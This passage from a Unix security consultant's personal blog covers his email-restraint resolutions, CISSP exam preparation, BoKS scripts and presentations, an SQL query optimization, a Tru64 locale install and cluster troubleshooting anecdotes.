This is by far the easiest target. I've simply refrained from contacting R or any of his colleagues in any way or form. Any work that needs to be done together with them was deferred to my colleagues. However, there was also a bit of misunderstanding on my part: this target was aimed not only at R and his team, but also at the other team. So, no less than two weeks after the troubles I made the mistake of contacting E from the other team, which blew up in my face. So, the target's been extended to: "I will refrain from contacting R, E and their teams in any way".

I almost stuck my foot in a hornets' nest yesterday! 

Almost a year ago I helped out one of the big projects going down at $CLIENT to achieve their über-important deadline. It involved some changes to one of our BoKS environments and also involved some programming to change the infrastructure. At the time I was in the lead, but I frequently discussed the matter with R to make sure things would work properly. The project met its deadline "and there was much rejoicing".

Now, there's a follow-up to the project which requires more programming to change the infrastructure. The project team defaulted to contacting me about it, as I'd been in the lead last time. Falling back into my old project-mode I quickly joined up and started discussing the matter. It was only when one of my colleagues remarked that R was also working on the programming that I remembered that this programming officially falls under R's team's responsibilities. And thus I came this -><- close to breaking this target! So many thanks to my colleague Rishi for jogging my memory! ( ^_^)

This has gone well! We've had a few problems and incidents that require cross-department cooperation in order to troubleshoot and solve the issue. In each of these cases I've drawn up complete reports of my findings and methods, which I then transferred to one of my team members. I urged them to go over my work, to make sure I didn't make any mistakes and to add to it, so they could then continue working on the project with R's and E's teams.

One of the biggest things I did to achieve this goal was to build a filter into my Outlook mailbox: all of my email will be delayed by an hour, for re-reading and adjustment, to prevent foot-in-mouth situations. That is, unless I go out of my way to tick a certain box that says "send this email right now" (which, in practice, means within a few minutes).

This has gone reasonably well, although I find that it's too easy to make the six clicks required for the "send immediately" option. I need to use this frequently when I'm on a specific shift, but I've also found myself using it with normal emails. That's not good and in one case it led to an ill-worded email making it to a customer. I discussed the matter with my colleague Tommy, who pointed out a few things to remind me of my own goals: it's better to phone than to email and never send emails when you're agitated.

And that's the key in this case: it happened when a customer had crossed a number of security guidelines in a rather blatant manner, which I felt needed to be dealt with quickly. My bad: I should've sat on my email a bit, reread it and then phoned the customer to call a meeting. Live and learn.

I've not conferred with my colleagues often enough in this regard. Sure I've asked them a few times, when I was in doubt... but I'm not in doubt often enough! (;^_^)

View or add comments (curr. 0)

Forcing restraint in email: message delays and reminders

2012-03-01 18:11:00

A warning message in your email template: be careful what you write

Last week I made a few resolutions for myself regarding communicating at work. These resolutions were reaffirmed today, in a meeting with my manager.

In order to help myself stick to these resolutions I've made a few configuration changes to my Outlook email client. These are by no means guarantees that I will improve, but they serve as stern reminders that my mindset needs changing. 

Every email I start writing, whether it's a reply or a new message, is filled with a big warning template asking me "Are you really using email? Wouldn't it be better to phone?". It also reminds me to "Watch your phrasing! Are you CCing people?". I couldn't find a way in Outlook to set up a template or standard email to do this, so I've adjusted my email signature to serve the purpose. 

I have also set up two filtering rules to delay my outgoing messages. With many thanks to How-to Geek's 'Preventing OhNo! after sending emails'.

  1. Apply rule to mail I send: assigned to category "CHECKED", delay delivery for 2 minutes and stop processing rules.
  2. Apply rule to mail I send: assign mail to category "NEED TO CHECK" and delay delivery for 60 minutes, except if mail is assigned to category "CHECKED", or if message is invitation or update.


The second rule determines that every single email I send will be delayed for an hour. This will prevent many foot-in-mouth situations and will also force me to review my message. Each of these messages gets classified as "NEED TO CHECK", unless I specifically go out of my way to set the message to "CHECKED". All messages marked as "CHECKED" will be delayed for only two minutes, after which they'll go on their way to the addressee.

I will also add an hourly reminder to my agenda to prompt myself to review all pending emails.

My manager indicated upfront that these changes will drastically lower my throughput at the office. Part of the reason why I'm so damn fast with our ticket queue is my over-reliance on email: fix an issue, inform the client through email, BOOM! next ticket! I have to admit that I felt a few pangs of OCD at this realization, because I always worry about our ticket queue. We're already behind on our work, so if I'm going to get slower we'll only fall behind further. Luckily my manager accepts this, as she feels that fixing my communications issues is more important than our current workload. Wow!

I'm quite hopeful that these measures will aid me in improving my communications at work. Right now I still need external stimuli to practice enryo.


Sadly there is no way of implementing the second set of precautions in Apple's Mail. The software does not support rules on outgoing email without the help of Mail ActOn, and even then it only allows such things as filing the sent message. It will not allow delays or forcing messages to be saved as drafts.

Because of this I tried to give Thunderbird a shot, but I still hate that piece of software. I can't help it. Alternatively I think Sparrow looks great, but I don't think it has the options I'm looking for. Even Entourage 2008 doesn't appear to support the kind of rules I'm using in Outlook 2003 at the office ;_; 

In the end I implemented my 'helpers' in Mail by:

  1. Adding a default signature, just like the one described above. 
  2. Remapping shift-command-d (Send message) to save the message as a draft.

View or add comments (curr. 2)

Doesn't that hit too close to home?

2011-08-14 10:26:00

work environment = lab environment

From Dilbert, of course.

View or add comments (curr. 5)

AWW YEAH! I passed my CISSP exam!

2010-12-14 21:29:00

Aw yea!

Tonight, after weeks of waiting and finally getting fed up with it all, I finally got the liberating email from ISC2:

"Dear Thomas Sluyter:

Congratulations! We are pleased to inform you that you have passed the Certified Information Systems Security Professional (CISSP®) examination - the first step in becoming certified as a CISSP."

As predicted they never mention anything about my passing grade, but I made it. The six months of studying and cramming paid off! Also congratulations to my work buddy Patryck, who's also passed. Both of us, on our first try. /o/

Image blatantly ripped from Super Effective, which is awesome ^_^

View or add comments (curr. 7)

Finally! I've taken my CISSP exam

2010-11-14 07:40:00

A large room of people

It has been a very long time in coming, but yesterday I finally took my CISSP exam. I started preparing five months ago, by reading the big 1200 page study guide from cover to cover. I've followed online classes and went to a week-long review class. I also took a few practice exams, both the ones included with the Harris book as well as others available online. And finally, in the last week before the exam I read through an excellent CISSP summary, written by my colleague Maarten de Frankrijker (awesome work Maarten!).

All in all I felt pretty well prepared for the exam.

Yesterday I left home at seven and because I arrived at the exam site 1.5 hours early I quickly went to the market in nearby Nieuwegein to pick up some stuff and have a chat with old acquaintances. I arrived back at the exam site half an hour early, at 0830. While other people were still rifling through their study guides and summaries, I instead opted to simply read "The League of Extraordinary Gentlemen" ^_^ I mean, if you don't know the materials an hour before the exam, all the cramming in the world isn't going to help you :)

We started the exam at 1005 and I finished at 1310, so it took me almost exactly three hours including breaks. My strategy for the test? I divided the 250 questions into ten blocks of 25. For each block I answered the questions in the booklet, did a quick double check and then copied the answers to the answer sheet. I then took a one minute break, stretching, yawning and having a drink, after which it was back to the next block of questions. After every hundred questions (so twice in the exam) I took a longer break, to walk around a little, to do some more stretching, to have a sandwich, etc. All in all, I made sure to remain relaxed at all times, assuming that pressure would only make me screw up questions.

Could I have used more time? Sure. Could I have gone over all 250 questions to see if I had made any mistakes? Sure. But I didn't. I felt right about the majority of questions I'd answered and figured that, if I -did- make any mistakes, I'd play the numbers game. How many questions would I have accidentally answered incorrectly? I feel that the chance is small. So, I was the first one to finish the exam and walk out of there. 

I'm very curious what the results will be! Unfortunately it'll take a while for the results to come in, a few weeks I'm told.

View or add comments (curr. 9)

Two nice tools for my daily workflow

2010-10-24 09:42:00

Evernote + EgretList

A month or so ago I started using Evernote, which could be described as a digital scrapbook-meets-notebook-meets-filestorage. The application and its basic use are free and available cross-platform, with a very nice web interface and client software for Mac OS X, Windows, iPhone OS, Blackberry and a few others. Anything that you add to your Evernote storage gets synchronized to all of your devices automatically. This means that the notes I took during my CISSP class were synced to my iPhone and that the web clippings I made at home can also be read online. And so on. It really is a nice service and there's no beating the price!

Evernote also have a paid service, which adds extra functionality to your account. Your file storage space gets increased, the search function indexes any PDFs you store and your mobile Evernote client will be able to store all of your notebooks locally (instead of accessing them through Wifi or 3G). At $45 a year I wouldn't say the value's bad. So far Evernote's been very, very helpful to me.

Helpful how? Well, currently I have two distinct workflows I rely on heavily. On the one hand there's my studies for my CISSP exam and my security research. On the other hand there's my preparations for the BoKS course I will be teaching in a week. Since Evernote allows me to create multiple scrapbooks, it's a cinch to grab any Wiki pages I like, as well as any security PDFs and store them together with my CISSP class notes and my ToDo list. Similarly, for the training I have an easy ToDo list, many notes from teleconf phone calls and suggestions for new exam questions. All neatly taggable, searchable and editable. 

Speaking of ToDo lists: I have combined my Evernote account with the stunningly beautiful EgretList iPhone app. EgretList logs into your Evernote account and searches all your notes for any and all (un)finished ToDo items. These ToDo items are sorted by their Evernote categories and notebooks and presented as a faux Moleskine notebook. So instead of having to search through many different Evernote notes to check/uncheck a ToDo item, you can easily do it through EgretList. Lovely :)

View or add comments (curr. 3)

Security problems: password entropy versus reuse

2010-09-14 22:24:00

An interesting security conversation

Comic continues here

As a security guy this comic makes 100% sense and it is in fact a very likely scenario. It is also the one reason why we (Marli and I) never use the same password twice, either between accounts or when rotating them semi-frequently.

View or add comments (curr. 0)

I spent a week in boot camp

2010-09-10 22:43:00

CISSP course books

You may recall that I started studying for my CISSP certification sometime in June. Since then I spent two months reading the 1200 page course book cover-to-cover, learning a lot of new things about the field of IT security. It was a chore getting through the book, but it's been very educational!

Last week I finally finished the last chapter, just in time for this week's "boot camp" week. Instead of using the five days of class learning things from scratch, I came prepared and only used the class to pinpoint any weak points in my knowledge and experience. Five days, forty hours of dry theory and many discussions later I now have a list of roughly 50 "TODO" items to tend to before my examination.

The exam is slated for the 13th of November and will take all of six hours. I'm actually a bit afraid that the remaining two months will be too long for me. I'll need a few weeks to kill all the "TODO" items, which will then leave me with a few more weeks before the exam. I could keep on cramming, I could get started on my next certs/studies, I could get some programming done, or I could simply unwind. I don't know... I'm afraid of letting all the info I've gathered slip from my head either way.

View or add comments (curr. 0)

Evaluation of my NLUUG presentation

2010-06-05 11:32:00

Wow, what a fright! Earlier this week I received an email from the NLUUG conference staff which contained the evaluation of all presentations. Mine was listed with the lowest grade of all at a sucky 5.0. What an awful scare! O-O

I had no clue what'd gone wrong. Sure, I'd talked too fast, cutting the presentation short. And yeah, one guy'd told me it was a borderline sales pitch. But overall I thought things'd gone pretty well and I'd gotten some positive reactions!

Eager to hear what went wrong, I asked the staff for some more details. Had visitors provided any specific, written feedback? This would of course be a prime learning opportunity! Well, unfortunately such a thing was not available. But! It turns out that, out of fifty attendants, only two people had actually filled out the evaluation. So my 5.0 was based on just 4% of the attendants. *phew* That's a bit of a relief :)

On the 22nd I'll be repeating my presentation at the USN monthly get-together. Sounds like fun :)

View or add comments (curr. 2)

NLUUG: we had a good day

2010-05-06 22:33:00

Ehhh. Ehhh... *shrug* I've got some mixed feelings about today.

While my presentation's reception was at least more than lukewarm, our exhibitor's booth was pretty damn quiet. It might've been the location, it might've been the backdrop, it might've been my suit... I dunno. I think we spoke to maybe ten people who weren't ex-colleagues or acquaintances of mine. So, nothing spectacular, but a good day nonetheless.

The great thing about today is that I finally got to meet Adri (a regular reader of my blog and a fellow father-of-a-1.5-year-old-girl) in person. *waves* Thank you very much for the great book you brought me, Adri! It's awesome! ^_^

View or add comments (curr. 1)

NLUUG: as ready as we'll be

2010-05-05 22:08:00

The Unixerius booth

Tomorrow's the big day! I'll be presenting at the NLUUG VJ-2010 convention, introducing the attendants to BoKS. I was told to expect a maximum of 80 people in my room, which is kind of reassuring.

Yesterday my colleague Kees and a friend of his built the Unixerius booth, which looks smashing, although I personally think it's a bit overkill. I mean, we're bound to get a question like "Say, what's the name of your company again?"

View or add comments (curr. 3)

The trial went alright

2010-04-20 22:06:00

So, just as a short update: the trial of my BoKS presentation at Proxy went fine :)

I -love- their new office, which is housed in a rather old, monumental building that has been restored and redecorated. Very nice! I was very anxious all day leading up to the talk, but when I was up there in front of the group everything came naturally. It really helps that I've already done the talk six or seven times, just by myself. It's made the story stick in my head.

Funnily enough I also met the gentleman who'll be gophering the room my talk at NLUUG will be in. :)

View or add comments (curr. 0)

A lesson I'd do well to learn

2010-04-16 05:52:00

... not because I'm going to work in Japan, but because even in the Netherlands it would be quite, quite helpful.

Quoting Hiko, who gives tips on surviving the Japanese workplace:

There are times in our lives that we have had the joy of letting rip with a phrase of self-righteous condemnation like [this is bulls**t!]. Look back and remember those times. Savor them, and cherish them knowing that so long as you are in Japan and wish to remain employed and an unstigmatized non-social-outcast, you will never be able to have memories like that ever again, unless the story ends "and so then I was fired, and left Japan and overall I was a better person for the experience". Japan is a pathologically non-confrontational culture. All that bottled up indignation and rage tends to get released as passive aggression, or internalized into digestive-tract disorders. The best solution is to learn to undo your reflex to want to butt heads and learn how to resolve conflict the Japanese way.

View or add comments (curr. 4)

Practicing my presentation

2010-04-12 21:56:00

The big presentation at NLUUG is three weeks away and I've been practicing my presentation. Next week I'll do a preview / trial run at Proxy Services, to get into the groove. To be honest I'm quite anxious about the whole deal. *shudder*

View or add comments (curr. 4)

Unix, BoKS and Nagios consulting

2009-10-25 18:28:00

I've been a Unix consultant in one form or another since the year 2000. Over those years I've gained expertise on the following subjects.

Thanks to the partnership between FoxT and my employer Unixerius I am an officially licensed BoKS consultant and trainer.

Other experience

Aside from my day-to-day Unix activities, I've also gained experience in the following fields:

Contacting me

I am currently employed by Unixerius, a small consulting firm in the Netherlands. We all specialize in one or two flavours of Unix and one or two additional fields (mine being monitoring and security). I am available for hire through Unixerius as I am not currently interested in going freelance.

You may also contact me directly.

For an overview of my work history, please visit my profile.

View or add comments (curr. 0)

Computer parlance - the divide between geeks and users

2009-10-18 17:59:00

I try to help out people with computer/network questions on various online fora, like Tweakers and One more thing. One of the things that frequently leads to both confusion and frustration is the divide between the parlance of true geeks and normal users.

For example, take this thread where people discuss the ins and outs of the UPC broadband service. Many, many times will one see frustration arise between the lesser experienced members and the veritable geeks regarding the usage of m/M and bit/byte.

As in:

* m versus M = milli versus mega = 10^-3 versus 10^6

* bit versus byte = 1 bit versus 8 bits

Normal folks will happily mix their m's and their M's and their bits and their bytes, not caring about the meaning of either. They reason according to the famous adage "Do what I mean, not what I say". So you'll frequently see things like:

Until two days ago I could happily download at a well-deserved 30mbits, which today fell to a miserable 5mbits. Then I rebooted the modem and now it's back up to 3.5mbits, so I R happy.

Does that sound confusing to you? Because to every true IT geek out there it does! So now there are dozens of folks like me berating the folks who keep mixing stuff up to "get it right, because you're not making sense". Of course we are then in turn labeled as nitpickers (or "comma fornicators", as the Dutch term would translate). The thing is, even though SI units are second nature to every (IT) geek, it seems that most "normal" people don't know all of them.

Sure, they know their millis from their centis and their kilos from their decas, but I don't think anyone in primary or high school usually deals with megas or anything bigger. Pretty odd, since you'd imagine that science class would cover stuff like megawatts. A quick poll with Marli (who is otherwise a very intelligent AND computer-savvy person) supports this idea: she knows "m", but not "M", and doesn't know the difference between a bit and a byte.
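For completeness, here's the arithmetic behind the pedantry in a small Python sketch. The speeds are made up for illustration; the point is just how far apart the two readings of "30 mbit" are.

```python
# The difference between M (mega, 10^6) and m (milli, 10^-3),
# and between bits and bytes (1 byte = 8 bits), in plain numbers.

def mbit_per_s_to_MB_per_s(mbit: float) -> float:
    """Convert megabits per second to megabytes per second (1 byte = 8 bits)."""
    return mbit / 8

# What the ISP means by "30 mbit": 30 Mbit/s.
speed_mbit = 30
speed_MB = mbit_per_s_to_MB_per_s(speed_mbit)
print(f"{speed_mbit} Mbit/s = {speed_MB} MB/s")  # 3.75 MB/s

# What a literal reading of "30 mbit" (millibit!) would mean.
literal_bits = 30 * 1e-3  # 'm' = milli = 10^-3
print(f"30 mbit/s taken literally = {literal_bits} bit/s")
```

So a "30 mbit" line delivers at most 3.75 megabytes per second of actual downloads, which is exactly the mixup behind complaints like the one quoted above.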

Ah, what're you going to do? I don't think this is a divide we'll quickly bridge, unless we unify to a completely new unit for measuring network speeds :) Might I suggest the "fruble"?


Mind you, I didn't write this just to rant. As an aspiring teacher I actually -do- wonder how one would best work around such a problem. Verbally there isn't any ambiguity, because one would always say "mbit" or "megabit" in full. But in writing there's much room for laziness and confusion, as discussed above. So, what do you do as a teacher? Do you keep on hammering your students to adhere to the proper standards? To me, that does seem to make the most sense.


*sigh* Then again, if even the supposed "professionals" can't get it right, who are we to complain. Right? =_=;

UPC doesn't know their bits from their bytes

View or add comments (curr. 5)

Open Coffee Almere, still fun and enjoyable

2009-10-01 18:47:00

Today's the first Thursday of the month, which means that it was time for another installment of Open Coffee Almere. It was our fifth get-together and I was glad to see about a dozen people show up. There were two other regulars, but the rest of'm were all new faces. One attendant even came down from the Leiden area!

I enjoyed myself tremendously and got to meet a few interesting people. The aforementioned gentleman does something really cool: he provides clinics where he combines lectures on champagne (the drink) with a certain message that management wants to convey to their colleagues. Say for example that a company would like to Go Green! (as they say). He would start the usual clinic about champagne and its many intricacies and then veer off towards ecological farming and how there's an analogy with what the company would like to achieve. I'm making a mess of explaining it, but it's really pretty cool -> Champagne Experience.

Today was the first time we'd gathered at the Tante Truus lunch room in town. I had no idea what to expect, so I was pleasantly surprised. The decor is lovely, the pie's great and the coffee awesome (they include a glass of water and a smidge of Baileys plus whipped cream with every coffee). I'd heartily recommend Truus for lunch or a break in the Almere Stad area.

View or add comments (curr. 3)

Published three new BoKS admin scripts

2009-09-12 23:01:00

The past few months I've been working on some BoKS scripts. Let's say that my daily job's inspired me to write a number of scripts that I just -know- are going to be useful in any BoKS environment. I've got plenty of ideas for both admin and monitoring scripts and finally I'm starting to see the fruits of my labour!

All of these scripts were written in my "own" time, so luckily I can do with them as I please. I've chosen to share all these scripts under a Creative Commons license, which means that you can use them, change them and even re-use them as long as you attribute the original code to me. I guess it sounds a bit like the GPL.

Anywho, for now I've published three scripts, with more to come! All scripts can be found in the Sysadmin section of my site, in the menubar. So far there are:

1. boks_safe_dump, which creates database dumps for specific hosts and host groups.

2. boks_new_rootpw, which sets and verifies new passwords on root accounts.

3. check_boks_replication, a monitor script to make sure BoKS database replication works alright.

As they say in HHGTTG: Share and enjoy!

View or add comments (curr. 1)

Working from home: scripting, BoKS and virtualization

2009-07-29 08:57:00

Given the fact that Marli can't currently provide the required care to Dana (due to her burnt hand), I've been working from home the past two days. With any luck Mar's hand will be healed by tonight and I'll get back to the office. In the meantime I've been scripting my ass off, getting more things done in two days than I usually do in a week. "I'm on a roll", as they say.

I had a list of five or six scripts that I wanted to write that work with FoxT's BoKS security software. Most of them are monitoring scripts that work with Tivoli (Nagios conversions coming up soon), with two sysadmin scripts to complete the set.

In order to test these scripts I'm setting up a test network, thanks to the wonders of Parallels Desktop. I admit that the 4GB of RAM in my Macbook is a bit anemic for running two Linux servers and a Solaris server, but it'll do for now. Maybe I ought to get a proper Mac Pro again. :)

Installing Solaris x86 in Parallels took a few tries, but I finally got it working, thanks to some tips found on the web.

* Give it a minimum of 512 MB RAM

* A small hard drive is fine, but don't set it to autoextend.

* Set 800x600 and 1024x768 as native display resolutions.

* Don't use the graphical/X11 installer, but go the console route.


This tutorial by Farhan Mashraqi was indispensable in getting the Realtek emulated network card to work under Solaris.

View or add comments (curr. 0)

Open Coffee networking event in Almere

2009-05-19 21:44:00

The Open Coffee Almere logo.

Taking a page out of the good book on Open Coffee networking events, I've decided to start one for Almere. Following the example of the original Open Coffee event, we'll gather every month (same Bat-time, same Bat-channel!) to meet new people over a cup of hot Java.

To get things going I've opened the Open Coffee Almere group at With a bit of luck we'll get a few dozen members soon.

To make the group stand out a little bit I've worked with Inkscape for a few hours. By combining the Almere coat of arms with the common logo for most Dutch OC groups I think I've managed to create something unique. Besides, I didn't feel like re-using the same low-res image all the other groups use ;) By making the logo a vector image I've guaranteed that we can resize it to -any- size without loss of quality.


I've set up a simple WordPress site at to act as a face to the masses.

View or add comments (curr. 1)

Speaking of overtime...

2008-11-17 18:44:00

Speaking of overtime... Why is it that every time I try to implement a quick fix for a sucky SNAFU in our BoKS environment, I get stuck in the office at night? Every single fscking time! Case in point: last Friday I discovered a rather crappy mixup in our BoKS infrastructure. Nothing critical, but it was causing a lot of people discomfort nonetheless. I stayed late that day to troubleshoot the issue and to formulate a hypothesis on the required fixes.

Today I went over said fixes with my colleagues and at 15:00 started the implementation of the first "quick fix". It was supposed to be done within an hour, but I'm still stuck here. The replica server just doesn't want to do its work and now I'm waiting for tech support to get back to me. I'm looking at my twelfth hour on the job today and I'd really like to go home to Marli and Dana. Hacking and dining at the office just isn't as cool as it used to be. Now I have people to take care of...

View or add comments (curr. 1)

Dabbling with SQL

2008-07-17 08:46:00

Bwahah, this is priceless :D

Yesterday I'd spent an hour or two writing a PHP+SQL script for one of my colleagues, so he could get his hands on the report he needed. We have this big database with statistics (gathered over the course of a year) and now it was a matter of getting the right info out of there. Let's say that what we wanted was the following:

For four quarters, per host, the total sum of the reported sizes of file systems.

Now, because my SQL skills aren't stellar, what I did was create a FOR-loop on a "select distinct" of the hostnames from the table. Then, for each loop instance I'd "select sum(size)" to get the totals for one date. But because we wanted to know the totals for four quarters, said query was run four times with a different date. This means that to get my hands on said information I was running 168 hosts * 4 dates = 672 queries in a row. All in all, it took our box fifteen minutes to come up with the final answer.

On my way to work this morning a thought struck me: I really ought to be able to do this with four queries, or even with -one-! What I want isn't that hard! And in a flash of insight it came to me!

SELECT hostname, date, SUM(size) AS total FROM vdisks WHERE (date="2007-10-03" OR date="2008-01-01" OR date="2008-04-01" OR date="2008-07-01") GROUP BY hostname, date;

The runtime of the total query has gone from 15 minutes to 1 second. o_O
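The difference between the two approaches is easy to reproduce. Below is a minimal sketch using Python's sqlite3 module; the vdisks table and its columns mirror the query above, but the host names and sizes are made up:

```python
import sqlite3

# Build a toy version of the statistics database: one row per host,
# per measurement date, per file system, with a reported size.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE vdisks (hostname TEXT, date TEXT, size INTEGER)")
dates = ["2007-10-03", "2008-01-01", "2008-04-01", "2008-07-01"]
for host in ("alpha", "bravo", "charlie"):
    for d in dates:
        for fs_size in (10, 20):  # two file systems per host
            con.execute("INSERT INTO vdisks VALUES (?, ?, ?)", (host, d, fs_size))

# Naive approach: one SUM query per host per date (the 672-query pattern).
naive = {}
hosts = [row[0] for row in con.execute("SELECT DISTINCT hostname FROM vdisks")]
for host in hosts:
    for d in dates:
        (total,) = con.execute(
            "SELECT SUM(size) FROM vdisks WHERE hostname=? AND date=?", (host, d)
        ).fetchone()
        naive[(host, d)] = total

# Optimized approach: a single query with GROUP BY, as in the post.
grouped = {
    (host, d): total
    for host, d, total in con.execute(
        "SELECT hostname, date, SUM(size) AS total FROM vdisks "
        "WHERE date IN (?, ?, ?, ?) GROUP BY hostname, date", dates
    )
}

assert naive == grouped  # same answer, one round-trip instead of hundreds
```

The database does the grouping internally in one pass instead of being asked hundreds of separate questions, which is where the 15-minutes-to-1-second difference comes from.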

Holy shit :D I guess it -does- pay to optimize your queries and applications!

View or add comments (curr. 0)

It's great to know one's work is appreciated

2008-06-03 15:05:00

Fuckin' A, man!

As the title of this post says: it's great to know that at least there's -someone- out there who appreciates the work you do :)

Case in point: I've been putting all my college term papers and summaries online and I've been keeping an extensive Wiki with class notes. From time to time a teacher or classmate will suggest that they've had some use for these sites, which is of course quite nice. But last night the aforementioned guidance counselor told me something that made me really happy ^_^

Next year she'll be teaching the second year's General didactics course. Because the course is currently given by one of our somewhat wishy-washy teachers, she was told that she'd have to hunt around and ask people for all the materials. I guess that most of the stuff was never really put to paper. Luckily Lisette knew about my site, found my summary and class notes and was done within a day. Her supervisor was perplexed! :D

So yeah, it's great to know that you're appreciated ^_^

View or add comments (curr. 2)

It's official: I'm job hunting as a teacher

2008-04-28 18:16:00

As the title suggests: I've officially started hunting for teaching positions for next school year. So far I've found a few very interesting schools that are actually quite close to home!

Let's see how this pans out.

Any of you Snowers reading this: no need to fret yet. I'm NOT running out on you on a moment's notice ;)

View or add comments (curr. 3)

Networking for fun and profit

2008-04-28 13:36:00

Until recently I used to hate networking: the perceived obligation to talk business with people whom I had no interest in. Over the past year or so a realisation has been growing in me though: networking is something that happens automatically, to a certain degree. And the parts that do need to happen consciously can be made as fun as you want them to be.

Example 1: Like many young folks in IT I hated the idea of networking and actually tried to avoid it. I reckoned that I had no network whatsoever and didn't care about it that much either. However, after eight years of working in IT I realised that I -do- have a network and that it's rather extensive! My friend/colleague Deborah recently nudged me to get onto LinkedIn and I managed to map out a large part of my network with minor effort. That's 150 names right there that I can tap into if I ever need help with my job, a technical question, or whatever. In case you're curious, here's my profile.

So yes, everyone has a network. Even you. All the people you have worked with, or for? Network! All the friends you made at that IT conference? Network! And so on...

Example 2: Sometimes you stumble upon stuff that piques your interest. Case in point: I recently poked around in, and wrote a review of, Ephorus. The product is Europe's leading anti-plagiarism software and both the teacher and the sysadmin in me got curious as to its workings. I managed to get my hands on a trial account (not normally given to students) and tried it out. I liked it well enough.

Then a few days later followed an e-mail from their director, asking if I'd like to come in for a talk. We had a great chat this morning, about Ephorus, about my work, about their work and just stuff in general. I had a great time and I even got a few -very- helpful suggestions that could help my career in the near future.

So you see? Networking consists of two things: the stuff you do every single day and just shooting the breeze with people you don't know. The third part, the obligatory marketing talks to possible customers, I'll leave to the sales folks ~_^

View or add comments (curr. 1)

Interesting debate on work ethics

2008-02-23 15:55:00

Here's an interesting question for you: if we want our kids/students to put in effort in their work, why don't we do the same? Isn't that a bit two-faced?

Case in point: my own studies. It's been suggested a few times that I'm working myself into my grave at school, by putting so much effort into each and every assignment and report.

It's true that, for most of my reports, I put in extra research that isn't needed. Without said research I feel that I'm doing a half-assed job, because I wouldn't completely understand the subject matter. I enjoy studying extra materials from a field that I'm only in the process of entering, because without them I feel less confident. I've even been complimented on my efforts by a teacher or two.

However, now people (both teachers and fellow students) are suggesting that I could save a lot of time by skipping all that research. "Just find the answers to the questions and move on." "Don't bother with all those nice looking reports." "Do you really think someone's going to read a 25 page paper every time you submit one?"

Now, I'm not disregarding their suggestions, because it's certainly true that I could do with a little spare time. Too much work and no play and all that. So yes, I will start accepting 60-70% as a good score as well.

However, the problem I have with all of this is that we would -love- to have our students go apeshit over their course material! We'd love it if they got totally enthused about maths, or English lit, or PE. So why are we so quick to jump to the "easy road" ourselves? That just feels illogical to me and actually a little bit like a betrayal as well.

View or add comments (curr. 1)

Installing additional locales on Tru64

2007-11-28 10:48:00

Wow, that was a fight :/

A few days ago we had a "new" TruCluster installed, running Tru64 5.1b. All of the stuff on it was plain vanilla, which meant that we were bound to run into some trouble. Case in point: the EMC/Legato Networker installation.

Upon installation setld complained as follows:


Your choice:

1 LGTOCLNT999 EMC NetWorker Client

cannot be installed as required subset IOSWWEURLOC??? is not available.


As the name (EURLOC) suggests, the missing subset involves the additional European locales that are not part of the default installation.

After fighting and searching and swearing a lot I got things sorted out as follows:

1. Get the Tru64 CD-ROM that was used for the installation. You'll need the "Associated Products 1" CD.

2. Insert the CD into your system.

3. Mount the CD: mount -r /dev/disk/cdrom1c /mnt

4. cd /mnt/Worldwide_Language_Support/kit

5. setld -l `pwd` IOSWWEURLOC540

This will install the locale I needed. Of course you are free to substitute the names of other locales as well.


Also, feel free to read through the proper instructions.

View or add comments (curr. 1)

Sometimes clusters do not guarantee high uptime

2007-10-20 13:36:00

Oh me, oh my... Clustering software does not always guarantee high uptime :/

At $CLIENT we've been having some nasty problems with our development SAP box. The box is part of a Veritas cluster and actually runs a bunch of Solaris Zones. The problems originally started about two months ago when we ran into a rare and newly discovered bug in UFS. It took a while for us to get the proper patches, but we finally managed to get that sorted out.

Remco installed the patches on Thursday morning, though he ran into some trouble. As always, patches can give you crap when it comes to cross-dependencies and this time wasn't any different. Around lunch time we thought we had things sorted out and went for the final reboot. All the zones were transferred to the proper boxen and things looked okay.

Until we tried to make a network connection. D:

None of the zones had access to the network, even though their interfaces were up and running. We searched for hours, but couldn't find anything. And like us, Sun was in the dark as well. In the end Remco and Sun worked all night to get an answer. Unfortunately they didn't make it, so I took over in the morning. Lemme tell you, once I was in the middle of all the tech and the phone calls and the managers, I found some more respect for Remco. He did a great job all through Thursday!

Just before lunch both Sun and one of the other guys came up with the solution. That was an awesome coincidence :) Turns out that the problems we were having were caused by timing issues during the boot-up of the Solaris Zones. Because we let Veritas Cluster handle the network interfaces, things turned sour. Things would've worked better if we'd let the Zone framework handle them.

The stopgap solution: freeze all cluster resources to prevent fail-over, then manually restart all virtual interfaces for the zones. And presto! It works again!

Happily we went to lunch, only to come back to more crap!

Turns out that the five SAP instances we were running wouldn't fit into the available swap space anymore. Weird! Before yesterday, things would barely fit in the 30GB of swap space. And now all of a sudden SAP would eat about 38GB! o_O WTF?!

A whole bunch of managers wanted us to work through the whole weekend to sort everything out. Naturally we didn't feel too enthused, especially since the box's SLA doesn't cover weekend work.

In the end we tacked on some temporary swap space, started SAP and left for the weekend. We'll just have to accept more downtime on Monday. It also leaves us with two big things to fix:

1. Modify the cluster/zone config for the network interfaces.

2. Find out why SAP has grown gluttonous and fix it.

View or add comments (curr. 1)

Grappling with HP ServiceGuard

2007-08-01 15:26:00

Last night's planned change was supposed to last about two hours: get in, install some patches, switch some cluster resources around the nodes, install some more patches and get out. The fact that the installation involved a HP-UX system didn't get me down, even though we only work with Sun Solaris and Tru64. The fact that it involved a ServiceGuard cluster did make me a little apprehensive, but I felt confident that the procedures $CLIENT had supplied me would suffice.

Everything went great, until the 80% mark... Failing the applications back to their original node didn't work for some reason and the cluster went into a wonky state. The cluster software told me everything was down, even though some of the software was obviously still running. The cluster wouldn't budge, not up, nor down. And that's when I found out that I rather dislike HP ServiceGuard, all because of one stupid flaw.

You see, all the other cluster software I know provides me with a proper listing of all the defined resources and their current state. Sun Cluster, Veritas Cluster Server and TruCluster? All of them are able to give me a neat list of what's running where and why something went wrong. Well, not HP Damn ServiceGuard. Feh!

We ended up stopping the database manually and resetting all kinds of flags on the cluster software. Finally, after six hours (instead of the original two), I got off from work around 23:00. Yes... /me heartily dislikes HP ServiceGuard.

View or add comments (curr. 1)

Happy sysadmin day!

2007-07-27 10:55:00

It's the last Friday of July and you know what that means. It's Sysadmin Day, an international holiday on which end-users thank their admins for all their hard work! Or it would be, if anyone actually cared... *sigh* All I ever wanted was an STFU mug.

To all the sysadmins who -do- get some appreciation from their customers today: good on you! Enjoy your brief period in the limelight! ^_^

View or add comments (curr. 2)

Sun Fire V890: pretty, but with a nasty flaw

2007-07-17 10:12:00

The ports section of the V890.

Oy vey! One of the folks on the Sun Fire V890 design team must've been mesjoge! Why else would you make such a weird design decision?!

What's up? I'll tell you what's up!
